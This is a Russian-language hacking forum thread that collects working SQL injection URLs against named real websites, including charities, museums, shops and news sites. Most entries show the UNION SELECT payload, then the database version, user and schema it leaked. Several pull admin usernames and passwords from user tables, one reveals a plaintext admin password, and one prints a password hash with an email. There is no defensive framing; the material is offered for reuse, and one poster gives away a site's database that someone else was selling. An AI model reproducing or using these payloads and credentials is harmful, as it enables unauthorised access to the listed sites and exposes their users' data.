SQL Инъекции

http://www.whitleyaward.org/display.php?id=31/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/**/LIMIT/**/1,1

Database Version: 4.1.22-standard-log
Database name: whit_data
User name: whit_whit@localhost

 

Видел где-то кто-то продавал бд от сайта
http://buker.beast.kz/ за 25 баксов=))))
кому надо вот бесплатно выкладываю уязвимость

User : beastkz_buker@localhost
DB : beastkz_buker
Ver : 5.0.67-community

P.s. необходима регистрация на сайте!

 

Code:

http://www.stroyaudit.com/faq.php?id=-16+union+select+1,version%28%29,3--

5.0.81-community-log
pdaomeg_audit
pdaomeg_audit@localhost

фирма аудита

 

Greatnorthroad.org pr5
Great North Road website was to provide a forum for expatriates who lived in the British protectorate of Northern Rhodesia

Code:

[COLOR=SlateGray]http://www.greatnorthroad.org/names/read.php?id=null' union select concat_ws(char(32,124,32),version(),user(),database()),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+--+[/COLOR]

4.1.22 | gnrweb@localhost | gnr

 

http://paragon.by/shop.php?id=-2110+union+select+1,2,concat_ws%280x3a,database%28%29,user%28%29,version%28%29%29,4,5,6,7,8,9,10,11,12,13,14/*&category=248&mode=detail

paragonby[email protected]:4.0.27-log

 

Code:

http://velograd.ru/show_cat2.php?grid=-1+union+select+concat_ws%280x3a,username,password,user%28%29,version%28%29%29+from+admin--

veloadmin:nInzyAturTl3:velograd@localhost:5.0.67-log

 

http://www.uyut2000.ru/show_cat2.php?grid=-12000+union+select+1

версия 4.0.27

удачи в жизни

 

http://www.kurierustecki.pl/artykul.php?id=-98/**/UNION/**/SELECT/**/1,2,3,4,5,6,7

Database Version: 5.0.77+tld4-log
Database name: baza10_pks_media
User name: [email protected]

Getting Data from table adder_user from database baza10_pks_media
Fields userass:email

[1]:agprint:1afeec4165629ac0fc96334a66ac3fe1:[email protected]

 

http://www.click-net.ru/index.php?page=0&newsid=-1+union+select+1,2,3,4,5,6--

Version: 4.0.26-nt-max

 

Gaucher.org.uk pr5
Gaucher Disease and the Association

Code:

[COLOR=SlateGray]http://www.gaucher.org.uk/enews.php?id=null union select null,concat_ws(char(32,124,32),version(),user(),database()),null,null,null[/COLOR]

5.0.45 | [email protected] | gaucher

 

PR7
http://www.dhi-paris.fr/index.php?id=termine&L=-1'+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a3a,username,password),12,13,14,15,16,17,18,19,20+from+be_users+/*+&tx_dhipevent_pi1[calDay]=24&tx_dhipevent_pi1[calMonth]=9&tx_dhipevent_pi1[calYear]=2009&tx_dhipevent_pi1[eventID]=717

 

http://www.biznismarket.com/category.php?IndustryID=124+union+select+1,2*****
5.0.67.d7-ourdelta-log

 

в поле search вводим:

это джумла, там много всего интересного)

 

http://www.texastechpulse.com/showjob.php?id=885+union+select+1,2,3,4,5,concat_ws(0x3a3a,id,email,web,password,lastlogin),7,8,9,10,11,12,13,14+from+users+limit+0,700+/*+

http://utgafa.midlari.is/index.php?act=menu&act_id=-97+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,username,password),8,9,10,11,12,13,14+from+w_users--

http://sjbald.com/index.php?act=menu&act_id=-11+union+select+1,2,3,4,5,concat_ws(0x3a3a,username,password),7,8,9,10,11+from+w_users+--+

http://www.brandugla.net/?act=articles&cat_id=-3+union+select+1,2,concat_ws(0x3a3a,username,password),4,5,6,7,8,9,10+from+w_users+--+&cat_text=Fr%E9ttir

http://www.azap.com.tw/news_detail.php?id=-6+uNiOn+sElEct+1,2,3,'4',5,6,7,8,9,10,11,12+from+information_schema.tables+--+

http://www.techconcepts.co.za/news.php?id=-43+union+select+1,2,3,4,5,6,7,8+--+

http://www.e-pc.co.za/index.php?pageid=-85+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*+

http://www.aveng.co.za/index.php?pageid=-100+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user+--+

 

www.rire-blagues.com

не знаю где админка(

 

PostgreSQL 8.1.11 on i686-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-14):scancomi

 

Code:

www.susppy.org/news.php?id=-1+union+select+1,2,group_concat(a_user,0x3d,a_pass,0x3C62723E),4+from+admin

edit:
watch islam

Code:

http://www.watchislam.com/videos/index.php?catid=-1+union+all+select+concat(1,char(45),version())

and one more
http://www.hrusa.org/field/listings.php?catid=-1+union+all+select+@@version,user(),null,null--

 

The Bergen Museum of art

Code:

Microsoft SQL Server 2005 - 9.00.1399.06 (X64) Oct 14 2005 00:35:21 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2) 

 

--

_http://www.rareearthpottery.com/view_item.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(table_name,0x20,column_name,0x20,table_schema)+from+information_schema.columns+limit+1,1

_http://salon-price.com/products.detail.php?pid=-1%20union%20select%201,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24

 

4kantvoordeel.nl
http://www.4kantvoordeel.nl/game.php?id=1/**/anD/**/1=7%20/**/uniON/**/seLEcT/**/1,conCaT_wS(cHaR(32,42,32),user(),database(),version()),3,4
version - 5.0.85
user - 4kant@localhost
database - 4kant
table - gebruikers

http://www.4kantvoordeel.nl/game.php?id=1/**/anD/**/1=7%20/**/uniON/**/seLEcT/**/1,conCaT(naam,0x3a3a3a,wachtwoord),3,4/**/FROM/**/gebruikers/**/LIMIT/**/1,1



n00b.co.il - PR=4 - olololo n00b)))
http://n00b.co.il/game.php?id=1/**/anD/**/1=7/**/uniON/**/seLEcT/**/conCat_wS(cHaR(32,42,32),user(),database(),version()),2,3
version - 5.0.67-userstats-log
database - n00b_main
user - [email protected]
table - wp_users

http://n00b.co.il/game.php?id=1/**/anD/**/1=7/**/uniON/**/seLEcT/**/conCat(user_login,0x3a3a3a,user_pass),2,3/**/FROM/**/wp_users/**/LIMIT/**/0,1